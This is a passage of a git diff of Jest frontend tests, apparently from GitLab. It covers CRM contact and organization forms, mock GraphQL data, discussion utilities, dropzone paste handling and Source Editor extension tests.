`new` route', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user clicks edit contact button', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); + + findEditContactButton().vm.$emit('click'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to `edit` route', async () => { + router.replace({ name: EDIT_ROUTE_NAME, params: { id: 16 } }); + mountComponent(); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should not exist when new form emits close', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + + findContactForm().vm.$emit('close'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + + it('should not exist when edit form emits close', async () => { + router.replace({ name: EDIT_ROUTE_NAME, params: { id: 16 } }); + mountComponent(); + await waitForPromises(); + + findContactForm().vm.$emit('close'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + }); + + describe('error', () => { + it('should exist on reject', async () => { + mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); + await waitForPromises(); - expect(createFlash).toHaveBeenCalled(); + expect(findError().exists()).toBe(true); + }); }); - it('renders correct results', async () => { - mountComponent({ mountFunction: mountExtended }); - await waitForPromises(); + describe('on successful load', () => { + it('should not render error', async () => { + mountComponent(); + await waitForPromises(); - expect(findRowByName(/Marty/i)).toHaveLength(1); - expect(findRowByName(/George/i)).toHaveLength(1); - expect(findRowByName(/jd@gitlab.com/i)).toHaveLength(1); + expect(findError().exists()).toBe(false); + }); + + it('renders correct results', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); + + expect(findRowByName(/Marty/i)).toHaveLength(1); + expect(findRowByName(/George/i)).toHaveLength(1); + expect(findRowByName(/jd@gitlab.com/i)).toHaveLength(1); + + const issueLink = findIssuesLinks().at(0); + expect(issueLink.exists()).toBe(true); + expect(issueLink.attributes('href')).toBe('/issues?scope=all&state=opened&crm_contact_id=16'); + }); }); }); diff --git a/spec/frontend/crm/mock_data.js b/spec/frontend/crm/mock_data.js index 4197621aaa6..f7af2ccdb72 100644 --- a/spec/frontend/crm/mock_data.js +++ b/spec/frontend/crm/mock_data.js @@ -40,7 +40,6 @@ export const getGroupContactsQueryResponse = { organization: null, }, ], - __typename: 'CustomerRelationsContactConnection', }, }, }, @@ -79,3 +78,84 @@ export const getGroupOrganizationsQueryResponse = { }, }, }; + +export const createContactMutationResponse = { + data: { + customerRelationsContactCreate: { + __typeName: 'CustomerRelationsContactCreatePayload', + contact: { + __typename: 'CustomerRelationsContact', + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'A', + lastName: 'B', + email: 'C', + phone: null, + description: null, + organization: null, + }, + errors: [], + }, + }, +}; + +export const createContactMutationErrorResponse = { + data: { + customerRelationsContactCreate: { + contact: null, + errors: ['Phone is invalid.'], + }, + }, +}; + +export const updateContactMutationResponse = { + data: { + customerRelationsContactUpdate: { + __typeName: 'CustomerRelationsContactCreatePayload', + contact: { + __typename: 'CustomerRelationsContact', + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'First', + lastName: 'Last', + email: 'email@example.com', + phone: null, + description: null, + organization: null, + }, + errors: [], + }, + }, +}; + +export const updateContactMutationErrorResponse = { + data: { + customerRelationsContactUpdate: { + contact: null, + errors: ['Email is invalid.'], + }, + }, +}; + +export const createOrganizationMutationResponse = { + data: { + customerRelationsOrganizationCreate: { + __typeName: 'CustomerRelationsOrganizationCreatePayload', + organization: { + __typename: 'CustomerRelationsOrganization', + id: 'gid://gitlab/CustomerRelations::Organization/2', + name: 'A', + defaultRate: null, + description: null, + }, + errors: [], + }, + }, +}; + +export const createOrganizationMutationErrorResponse = { + data: { + customerRelationsOrganizationCreate: { + organization: null, + errors: ['Name cannot be blank.'], + }, + }, +}; diff --git a/spec/frontend/crm/new_organization_form_spec.js b/spec/frontend/crm/new_organization_form_spec.js new file mode 100644 index 00000000000..976b626f35f --- /dev/null +++ b/spec/frontend/crm/new_organization_form_spec.js @@ -0,0 +1,109 @@ +import { GlAlert } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import NewOrganizationForm from '~/crm/components/new_organization_form.vue'; +import createOrganizationMutation from '~/crm/components/queries/create_organization.mutation.graphql'; +import getGroupOrganizationsQuery from '~/crm/components/queries/get_group_organizations.query.graphql'; +import { + createOrganizationMutationErrorResponse, + createOrganizationMutationResponse, + getGroupOrganizationsQueryResponse, +} from './mock_data'; + +describe('Customer relations organizations root app', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + let queryHandler; + + const findCreateNewOrganizationButton = () => + wrapper.findByTestId('create-new-organization-button'); + const findCancelButton = () => wrapper.findByTestId('cancel-button'); + const findForm = () => wrapper.find('form'); + const findError = () => wrapper.findComponent(GlAlert); + + const mountComponent = () => { + fakeApollo = createMockApollo([[createOrganizationMutation, queryHandler]]); + fakeApollo.clients.defaultClient.cache.writeQuery({ + query: getGroupOrganizationsQuery, + variables: { groupFullPath: 'flightjs' }, + data: getGroupOrganizationsQueryResponse.data, + }); + wrapper = shallowMountExtended(NewOrganizationForm, { + provide: { groupId: 26, groupFullPath: 'flightjs' }, + apolloProvider: fakeApollo, + propsData: { drawerOpen: true }, + }); + }; + + beforeEach(() => { + queryHandler = jest.fn().mockResolvedValue(createOrganizationMutationResponse); + }); + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + describe('Create new organization button', () => { + it('should be disabled by default', () => { + mountComponent(); + + expect(findCreateNewOrganizationButton().attributes('disabled')).toBeTruthy(); + }); + + it('should not be disabled when first, last and email have values', async () => { + mountComponent(); + + wrapper.find('#organization-name').vm.$emit('input', 'A'); + await waitForPromises(); + + expect(findCreateNewOrganizationButton().attributes('disabled')).toBeFalsy(); + }); + }); + + it("should emit 'close' when cancel button is clicked", () => { + mountComponent(); + + findCancelButton().vm.$emit('click'); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + + describe('when query is successful', () => { + it("should emit 'close'", async () => { + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when query fails', () => { + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(createOrganizationMutationErrorResponse); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Name cannot be blank.'); + }); + }); +}); diff --git a/spec/frontend/crm/organizations_root_spec.js b/spec/frontend/crm/organizations_root_spec.js index a69a099e03d..aef417964f4 100644 --- a/spec/frontend/crm/organizations_root_spec.js +++ b/spec/frontend/crm/organizations_root_spec.js @@ -1,39 +1,59 @@ -import { GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; +import VueRouter from 'vue-router'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; import OrganizationsRoot from '~/crm/components/organizations_root.vue'; +import NewOrganizationForm from '~/crm/components/new_organization_form.vue'; +import { NEW_ROUTE_NAME } from '~/crm/constants'; +import routes from '~/crm/routes'; import getGroupOrganizationsQuery from '~/crm/components/queries/get_group_organizations.query.graphql'; import { getGroupOrganizationsQueryResponse } from './mock_data'; -jest.mock('~/flash'); - describe('Customer relations organizations root app', () => { Vue.use(VueApollo); + Vue.use(VueRouter); let wrapper; let fakeApollo; + let router; const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); const findRowByName = (rowName) => wrapper.findAllByRole('row', { name: rowName }); + const findIssuesLinks = () => wrapper.findAllByTestId('issues-link'); + const findNewOrganizationButton = () => wrapper.findByTestId('new-organization-button'); + const findNewOrganizationForm = () => wrapper.findComponent(NewOrganizationForm); + const findError = () => wrapper.findComponent(GlAlert); const successQueryHandler = jest.fn().mockResolvedValue(getGroupOrganizationsQueryResponse); + const basePath = '/groups/flightjs/-/crm/organizations'; + const mountComponent = ({ queryHandler = successQueryHandler, mountFunction = shallowMountExtended, + canAdminCrmOrganization = true, } = {}) => { fakeApollo = createMockApollo([[getGroupOrganizationsQuery, queryHandler]]); wrapper = mountFunction(OrganizationsRoot, { - provide: { groupFullPath: 'flightjs' }, + router, + provide: { canAdminCrmOrganization, groupFullPath: 'flightjs', groupIssuesPath: '/issues' }, apolloProvider: fakeApollo, }); }; + beforeEach(() => { + router = new VueRouter({ + base: basePath, + mode: 'history', + routes, + }); + }); + afterEach(() => { wrapper.destroy(); fakeApollo = null; + router = null; }); it('should render loading spinner', () => { @@ -42,19 +62,84 @@ describe('Customer relations organizations root app', () => { expect(findLoadingIcon().exists()).toBe(true); }); + describe('new organization button', () => { + it('should exist when user has permission', () => { + mountComponent(); + + expect(findNewOrganizationButton().exists()).toBe(true); + }); + + it('should not exist when user has no permission', () => { + mountComponent({ canAdminCrmOrganization: false }); + + expect(findNewOrganizationButton().exists()).toBe(false); + }); + }); + + describe('new organization form', () => { + it('should not exist by default', async () => { + mountComponent(); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(false); + }); + + it('should exist when user clicks new contact button', async () => { + mountComponent(); + + findNewOrganizationButton().vm.$emit('click'); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to /new', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(true); + }); + + it('should not exist when form emits close', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + + findNewOrganizationForm().vm.$emit('close'); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(false); + }); + }); + it('should render error message on reject', async () => { mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); await waitForPromises(); - expect(createFlash).toHaveBeenCalled(); + expect(findError().exists()).toBe(true); }); - it('renders correct results', async () => { - mountComponent({ mountFunction: mountExtended }); - await waitForPromises(); + describe('on successful load', () => { + it('should not render error', async () => { + mountComponent(); + await waitForPromises(); + + expect(findError().exists()).toBe(false); + }); + + it('renders correct results', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); - expect(findRowByName(/Test Inc/i)).toHaveLength(1); - expect(findRowByName(/VIP/i)).toHaveLength(1); - expect(findRowByName(/120/i)).toHaveLength(1); + expect(findRowByName(/Test Inc/i)).toHaveLength(1); + expect(findRowByName(/VIP/i)).toHaveLength(1); + expect(findRowByName(/120/i)).toHaveLength(1); + + const issueLink = findIssuesLinks().at(0); + expect(issueLink.exists()).toBe(true); + expect(issueLink.attributes('href')).toBe( + '/issues?scope=all&state=opened&crm_organization_id=2', + ); + }); }); }); diff --git a/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap b/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap deleted file mode 100644 index ed8ed3254ba..00000000000 --- a/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap +++ /dev/null @@ -1,28 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`Design note pin component should match the snapshot of note with index 1`] = ` -<button - aria-label="Comment '1' position" - class="gl-absolute gl-display-flex gl-align-items-center gl-justify-content-center gl-font-lg gl-outline-0! js-image-badge badge badge-pill" - style="left: 10px; top: 10px;" - type="button" -> - - 1 - -</button> -`; - -exports[`Design note pin component should match the snapshot of note without index 1`] = ` -<button - aria-label="Comment form position" - class="gl-absolute gl-display-flex gl-align-items-center gl-justify-content-center gl-font-lg gl-outline-0! btn-transparent comment-indicator gl-p-0" - style="left: 10px; top: 10px;" - type="button" -> - <gl-icon-stub - name="image-comment-dark" - size="24" - /> -</button> -`; diff --git a/spec/frontend/design_management/mock_data/apollo_mock.js b/spec/frontend/design_management/mock_data/apollo_mock.js index cdd07a16e90..2a43b5debee 100644 --- a/spec/frontend/design_management/mock_data/apollo_mock.js +++ b/spec/frontend/design_management/mock_data/apollo_mock.js @@ -5,6 +5,7 @@ export const designListQueryResponse = { id: '1', issue: { __typename: 'Issue', + id: 'issue-1', designCollection: { __typename: 'DesignCollection', copyState: 'READY', @@ -97,6 +98,7 @@ export const permissionsQueryResponse = { id: '1', issue: { __typename: 'Issue', + id: 'issue-1', userPermissions: { __typename: 'UserPermissions', createDesign: true }, }, }, diff --git a/spec/frontend/diffs/components/diff_discussions_spec.js b/spec/frontend/diffs/components/diff_discussions_spec.js index c847a79435a..bd6f4cd2545 100644 --- a/spec/frontend/diffs/components/diff_discussions_spec.js +++ b/spec/frontend/diffs/components/diff_discussions_spec.js @@ -1,7 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { mount, createLocalVue } from '@vue/test-utils'; import DiffDiscussions from '~/diffs/components/diff_discussions.vue'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import { createStore } from '~/mr_notes/stores'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import NoteableDiscussion from '~/notes/components/noteable_discussion.vue'; @@ -20,9 +19,6 @@ describe('DiffDiscussions', () => { store = createStore(); wrapper = mount(localVue.extend(DiffDiscussions), { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussions: getDiscussionsMockData(), ...props, diff --git a/spec/frontend/diffs/components/diff_file_spec.js b/spec/frontend/diffs/components/diff_file_spec.js index feb7118744b..dc0ed621a64 100644 --- a/spec/frontend/diffs/components/diff_file_spec.js +++ b/spec/frontend/diffs/components/diff_file_spec.js @@ -3,7 +3,7 @@ import MockAdapter from 'axios-mock-adapter'; import { nextTick } from 'vue'; import Vuex from 'vuex'; -import DiffContentComponent from '~/diffs/components/diff_content.vue'; +import DiffContentComponent from 'jh_else_ce/diffs/components/diff_content.vue'; import DiffFileComponent from '~/diffs/components/diff_file.vue'; import DiffFileHeaderComponent from '~/diffs/components/diff_file_header.vue'; diff --git a/spec/frontend/diffs/components/diff_row_spec.js b/spec/frontend/diffs/components/diff_row_spec.js index c0c92908701..4c5ce429c9d 100644 --- a/spec/frontend/diffs/components/diff_row_spec.js +++ b/spec/frontend/diffs/components/diff_row_spec.js @@ -277,3 +277,36 @@ describe('DiffRow', () => { }); }); }); + +describe('coverage state memoization', () => { + it('updates when coverage is loaded', () => { + const lineWithoutCoverage = {}; + const lineWithCoverage = { + text: 'Test coverage: 5 hits', + class: 'coverage', + }; + + const unchangedProps = { + inline: true, + filePath: 'file/path', + line: { left: { new_line: 3 } }, + }; + + const noCoverageProps = { + fileLineCoverage: () => lineWithoutCoverage, + coverageLoaded: false, + ...unchangedProps, + }; + const coverageProps = { + fileLineCoverage: () => lineWithCoverage, + coverageLoaded: true, + ...unchangedProps, + }; + + // this caches no coverage for the line + expect(DiffRow.coverageStateLeft(noCoverageProps)).toStrictEqual(lineWithoutCoverage); + + // this retrieves coverage for the line because it has been recached + expect(DiffRow.coverageStateLeft(coverageProps)).toStrictEqual(lineWithCoverage); + }); +}); diff --git a/spec/frontend/diffs/store/mutations_spec.js b/spec/frontend/diffs/store/mutations_spec.js index c104fcd5fb9..d8611b1ce1b 100644 --- a/spec/frontend/diffs/store/mutations_spec.js +++ b/spec/frontend/diffs/store/mutations_spec.js @@ -112,6 +112,7 @@ describe('DiffsStoreMutations', () => { mutations[types.SET_COVERAGE_DATA](state, coverage); expect(state.coverageFiles).toEqual(coverage); + expect(state.coverageLoaded).toEqual(true); }); }); diff --git a/spec/frontend/diffs/utils/discussions_spec.js b/spec/frontend/diffs/utils/discussions_spec.js deleted file mode 100644 index 9a3d442d943..00000000000 --- a/spec/frontend/diffs/utils/discussions_spec.js +++ /dev/null @@ -1,133 +0,0 @@ -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; - -describe('Diff Discussions Utils', () => { - describe('discussionIntersectionObserverHandlerFactory', () => { - it('creates a handler function', () => { - expect(discussionIntersectionObserverHandlerFactory()).toBeInstanceOf(Function); - }); - - describe('intersection observer handler', () => { - const functions = { - setCurrentDiscussionId: jest.fn(), - getPreviousUnresolvedDiscussionId: jest.fn().mockImplementation((id) => { - return Number(id) - 1; - }), - }; - const defaultProcessableWrapper = { - entry: { - time: 0, - isIntersecting: true, - rootBounds: { - bottom: 0, - }, - boundingClientRect: { - top: 0, - }, - }, - currentDiscussion: { - id: 1, - }, - isFirstUnresolved: false, - isDiffsPage: true, - }; - let handler; - let getMock; - let setMock; - - beforeEach(() => { - functions.setCurrentDiscussionId.mockClear(); - functions.getPreviousUnresolvedDiscussionId.mockClear(); - - defaultProcessableWrapper.functions = functions; - - setMock = functions.setCurrentDiscussionId.mock; - getMock = functions.getPreviousUnresolvedDiscussionId.mock; - handler = discussionIntersectionObserverHandlerFactory(); - }); - - it('debounces multiple simultaneous requests into one queue', () => { - handler(defaultProcessableWrapper); - handler(defaultProcessableWrapper); - handler(defaultProcessableWrapper); - handler(defaultProcessableWrapper); - - expect(setTimeout).toHaveBeenCalledTimes(4); - expect(clearTimeout).toHaveBeenCalledTimes(3); - - // By only advancing to one timer, we ensure it's all being batched into one queue - jest.advanceTimersToNextTimer(); - - expect(functions.setCurrentDiscussionId).toHaveBeenCalledTimes(4); - }); - - it('properly processes, sorts and executes the correct actions for a set of observed intersections', () => { - handler(defaultProcessableWrapper); - handler({ - // This observation is here to be filtered out because it's a scrollDown - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - isIntersecting: false, - boundingClientRect: { top: 10 }, - rootBounds: { bottom: 100 }, - }, - }); - handler({ - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - time: 101, - isIntersecting: false, - rootBounds: { bottom: -100 }, - }, - currentDiscussion: { id: 20 }, - }); - handler({ - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - time: 100, - isIntersecting: false, - boundingClientRect: { top: 100 }, - }, - currentDiscussion: { id: 30 }, - isDiffsPage: false, - }); - handler({ - ...defaultProcessableWrapper, - isFirstUnresolved: true, - entry: { - ...defaultProcessableWrapper.entry, - time: 100, - isIntersecting: false, - boundingClientRect: { top: 200 }, - }, - }); - - jest.advanceTimersToNextTimer(); - - expect(setMock.calls.length).toBe(4); - expect(setMock.calls[0]).toEqual([1]); - expect(setMock.calls[1]).toEqual([29]); - expect(setMock.calls[2]).toEqual([null]); - expect(setMock.calls[3]).toEqual([19]); - - expect(getMock.calls.length).toBe(2); - expect(getMock.calls[0]).toEqual([30, false]); - expect(getMock.calls[1]).toEqual([20, true]); - - [ - setMock.invocationCallOrder[0], - getMock.invocationCallOrder[0], - setMock.invocationCallOrder[1], - setMock.invocationCallOrder[2], - getMock.invocationCallOrder[1], - setMock.invocationCallOrder[3], - ].forEach((order, idx, list) => { - // Compare each invocation sequence to the one before it (except the first one) - expect(list[idx - 1] || -1).toBeLessThan(order); - }); - }); - }); - }); -}); diff --git a/spec/frontend/dropzone_input_spec.js b/spec/frontend/dropzone_input_spec.js index 12e10f7c5f4..11414e8890d 100644 --- a/spec/frontend/dropzone_input_spec.js +++ b/spec/frontend/dropzone_input_spec.js @@ -32,6 +32,8 @@ describe('dropzone_input', () => { }); describe('handlePaste', () => { + let form; + const triggerPasteEvent = (clipboardData = {}) => { const event = $.Event('paste'); const origEvent = new Event('paste'); @@ -45,11 +47,15 @@ describe('dropzone_input', () => { beforeEach(() => { loadFixtures('issues/new-issue.html'); - const form = $('#new_issue'); + form = $('#new_issue'); form.data('uploads-path', TEST_UPLOAD_PATH); dropzoneInput(form); }); + afterEach(() => { + form = null; + }); + it('pastes Markdown tables', () => { jest.spyOn(PasteMarkdownTable.prototype, 'isTable'); jest.spyOn(PasteMarkdownTable.prototype, 'convertToTableMarkdown'); @@ -86,6 +92,27 @@ describe('dropzone_input', () => { expect(axiosMock.history.post[0].data.get('file').name).toHaveLength(246); }); + it('disables generated image file when clipboardData have both image and text', () => { + const TEST_PLAIN_TEXT = 'This wording is a plain text.'; + triggerPasteEvent({ + types: ['text/plain', 'Files'], + getData: () => TEST_PLAIN_TEXT, + items: [ + { + kind: 'text', + type: 'text/plain', + }, + { + kind: 'file', + type: 'image/png', + getAsFile: () => new Blob(), + }, + ], + }); + + expect(form.find('.js-gfm-input')[0].value).toBe(''); + }); + it('display original file name in comment box', async () => { const axiosMock = new MockAdapter(axios); triggerPasteEvent({ diff --git a/spec/frontend/editor/helpers.js b/spec/frontend/editor/helpers.js index 6f7cdf6efb3..252d783ad6d 100644 --- a/spec/frontend/editor/helpers.js +++ b/spec/frontend/editor/helpers.js @@ -1,4 +1,22 @@ -export class MyClassExtension { +/* eslint-disable max-classes-per-file */ + +// Helpers +export const spyOnApi = (extension, spiesObj = {}) => { + const origApi = extension.api; + if (extension?.obj) { + jest.spyOn(extension.obj, 'provides').mockReturnValue({ + ...origApi, + ...spiesObj, + }); + } +}; + +// Dummy Extensions +export class SEClassExtension { + static get extensionName() { + return 'SEClassExtension'; + } + // eslint-disable-next-line class-methods-use-this provides() { return { @@ -8,8 +26,9 @@ export class MyClassExtension { } } -export function MyFnExtension() { +export function SEFnExtension() { return { + extensionName: 'SEFnExtension', fnExtMethod: () => 'fn own method', provides: () => { return { @@ -19,8 +38,9 @@ export function MyFnExtension() { }; } -export const MyConstExt = () => { +export const SEConstExt = () => { return { + extensionName: 'SEConstExt', provides: () => { return { constExtMethod: () => 'const own method', @@ -29,9 +49,39 @@ export const MyConstExt = () => { }; }; +export class SEWithSetupExt { + static get extensionName() { + return 'SEWithSetupExt'; + } + // eslint-disable-next-line class-methods-use-this + onSetup(instance, setupOptions = {}) { + if (setupOptions && !Array.isArray(setupOptions)) { + Object.entries(setupOptions).forEach(([key, value]) => { + Object.assign(instance, { + [key]: value, + }); + }); + } + } + provides() { + return { + returnInstanceAndProps: (instance, stringProp, objProp = {}) => { + return [stringProp, objProp, instance]; + }, + returnInstance: (instance) => { + return instance; + }, + giveMeContext: () => { + return this; + }, + }; + } +} + export const conflictingExtensions = { WithInstanceExt: () => { return { + extensionName: 'WithInstanceExt', provides: () => { return { use: () => 'A conflict with instance', @@ -42,6 +92,7 @@ export const conflictingExtensions = { }, WithAnotherExt: () => { return { + extensionName: 'WithAnotherExt', provides: () => { return { shared: () => 'A conflict with extension', diff --git a/spec/frontend/editor/source_editor_ci_schema_ext_spec.js b/spec/frontend/editor/source_editor_ci_schema_ext_spec.js index 8a0d1ecf1af..5eaac9e9ef9 100644 --- a/spec/frontend/editor/source_editor_ci_schema_ext_spec.js +++ b/spec/frontend/editor/source_editor_ci_schema_ext_spec.js @@ -23,7 +23,7 @@ describe('~/editor/editor_ci_config_ext', () => { blobPath, blobContent: '', }); - instance.use(new CiSchemaExtension()); + instance.use({ definition: CiSchemaExtension }); }; beforeAll(() => { diff --git a/spec/frontend/editor/source_editor_extension_base_spec.js b/spec/frontend/editor/source_editor_extension_base_spec.js index a0fb1178b3b..6606557fd1f 100644 --- a/spec/frontend/editor/source_editor_extension_base_spec.js +++ b/spec/frontend/editor/source_editor_extension_base_spec.js @@ -2,40 +2,25 @@ import { Range } from 'monaco-editor'; import { useFakeRequestAnimationFrame } from 'helpers/fake_request_animation_frame'; import setWindowLocation from 'helpers/set_window_location_helper'; import { - ERROR_INSTANCE_REQUIRED_FOR_EXTENSION, EDITOR_TYPE_CODE, EDITOR_TYPE_DIFF, + EXTENSION_BASE_LINE_LINK_ANCHOR_CLASS, + EXTENSION_BASE_LINE_NUMBERS_CLASS, } from '~/editor/constants'; import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; - -jest.mock('~/helpers/startup_css_helper', () => { - return { - waitForCSSLoaded: jest.fn().mockImplementation((cb) => { - // We have to artificially put the callback's execution - // to the end of the current call stack to be able to - // test that the callback is called after waitForCSSLoaded. - // setTimeout with 0 delay does exactly that. - // Otherwise we might end up with false positive results - setTimeout(() => { - cb.apply(); - }, 0); - }), - }; -}); +import EditorInstance from '~/editor/source_editor_instance'; describe('The basis for an Source Editor extension', () => { const defaultLine = 3; - let ext; let event; - const defaultOptions = { foo: 'bar' }; const findLine = (num) => { - return document.querySelector(`.line-numbers:nth-child(${num})`); + return document.querySelector(`.${EXTENSION_BASE_LINE_NUMBERS_CLASS}:nth-child(${num})`); }; const generateLines = () => { let res = ''; for (let line = 1, lines = 5; line <= lines; line += 1) { - res += `<div class="line-numbers">${line}</div>`; + res += `<div class="${EXTENSION_BASE_LINE_NUMBERS_CLASS}">${line}</div>`; } return res; }; @@ -49,6 +34,9 @@ describe('The basis for an Source Editor extension', () => { }, }; }; + const createInstance = (baseInstance = {}) => { + return new EditorInstance(baseInstance); + }; beforeEach(() => { setFixtures(generateLines()); @@ -59,95 +47,47 @@ describe('The basis for an Source Editor extension', () => { jest.clearAllMocks(); }); - describe('constructor', () => { - it('resets the layout in waitForCSSLoaded callback', async () => { - const instance = { - layout: jest.fn(), - }; - ext = new SourceEditorExtension({ instance }); - expect(instance.layout).not.toHaveBeenCalled(); - - // We're waiting for the waitForCSSLoaded mock to kick in - await jest.runOnlyPendingTimers(); + describe('onUse callback', () => { + it('initializes the line highlighting', () => { + const instance = createInstance(); + const spy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - expect(instance.layout).toHaveBeenCalled(); + instance.use({ definition: SourceEditorExtension }); + expect(spy).toHaveBeenCalled(); }); it.each` - description | instance | options - ${'accepts configuration options and instance'} | ${{}} | ${defaultOptions} - ${'leaves instance intact if no options are passed'} | ${{}} | ${undefined} - ${'does not fail if both instance and the options are omitted'} | ${undefined} | ${undefined} - ${'throws if only options are passed'} | ${undefined} | ${defaultOptions} - `('$description', ({ instance, options } = {}) => { - SourceEditorExtension.deferRerender = jest.fn(); - const originalInstance = { ...instance }; - - if (instance) { - if (options) { - Object.entries(options).forEach((prop) => { - expect(instance[prop]).toBeUndefined(); - }); - // Both instance and options are passed - ext = new SourceEditorExtension({ instance, ...options }); - Object.entries(options).forEach(([prop, value]) => { - expect(ext[prop]).toBeUndefined(); - expect(instance[prop]).toBe(value); - }); + description | instanceType | shouldBeCalled + ${'Sets up'} | ${EDITOR_TYPE_CODE} | ${true} + ${'Does not set up'} | ${EDITOR_TYPE_DIFF} | ${false} + `( + '$description the line linking for $instanceType instance', + ({ instanceType, shouldBeCalled }) => { + const instance = createInstance({ + getEditorType: jest.fn().mockReturnValue(instanceType), + onMouseMove: jest.fn(), + onMouseDown: jest.fn(), + }); + const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); + + instance.use({ definition: SourceEditorExtension }); + if (shouldBeCalled) { + expect(spy).toHaveBeenCalledWith(instance); } else { - ext = new SourceEditorExtension({ instance }); - expect(instance).toEqual(originalInstance); + expect(spy).not.toHaveBeenCalled(); } - } else if (options) { - // Options are passed without instance - expect(() => { - ext = new SourceEditorExtension({ ...options }); - }).toThrow(ERROR_INSTANCE_REQUIRED_FOR_EXTENSION); - } else { - // Neither options nor instance are passed - expect(() => { - ext = new SourceEditorExtension(); - }).not.toThrow(); - } - }); - - it('initializes the line highlighting', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - ext = new SourceEditorExtension({ instance: {} }); - expect(spy).toHaveBeenCalled(); - }); - - it('sets up the line linking for code instance', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); - const instance = { - getEditorType: jest.fn().mockReturnValue(EDITOR_TYPE_CODE), - onMouseMove: jest.fn(), - onMouseDown: jest.fn(), - }; - ext = new SourceEditorExtension({ instance }); - expect(spy).toHaveBeenCalledWith(instance); - }); - - it('does not set up the line linking for diff instance', () => { - SourceEditorExtension.deferRerender = jest.fn(); - const spy = jest.spyOn(SourceEditorExtension, 'setupLineLinking'); - const instance = { - getEditorType: jest.fn().mockReturnValue(EDITOR_TYPE_DIFF), - }; - ext = new SourceEditorExtension({ instance }); - expect(spy).not.toHaveBeenCalled(); - }); + }, + ); }); describe('highlightLines', () => { const revealSpy = jest.fn(); const decorationsSpy = jest.fn(); - const instance = { + const instance = createInstance({ revealLineInCenter: revealSpy, deltaDecorations: decorationsSpy, - }; + }); + instance.use({ definition: SourceEditorExtension }); const defaultDecorationOptions = { isWholeLine: true, className: 'active-line-text', @@ -175,7 +115,7 @@ describe('The basis for an Source Editor extension', () => { ${'uses bounds if both hash and bounds exist'} | ${'#L7-42'} | ${[3, 5]} | ${true} | ${[3, 1, 5, 1]} `('$desc', ({ hash, bounds, shouldReveal, expectedRange } = {}) => { window.location.hash = hash; - SourceEditorExtension.highlightLines(instance, bounds); + instance.highlightLines(bounds); if (!shouldReveal) { expect(revealSpy).not.toHaveBeenCalled(); expect(decorationsSpy).not.toHaveBeenCalled(); @@ -193,11 +133,11 @@ describe('The basis for an Source Editor extension', () => { } }); - it('stores the line decorations on the instance', () => { + it('stores the line decorations on the instance', () => { decorationsSpy.mockReturnValue('foo'); window.location.hash = '#L10'; expect(instance.lineDecorations).toBeUndefined(); - SourceEditorExtension.highlightLines(instance); + instance.highlightLines(); expect(instance.lineDecorations).toBe('foo'); }); @@ -215,7 +155,7 @@ describe('The basis for an Source Editor extension', () => { }, ]; instance.lineDecorations = 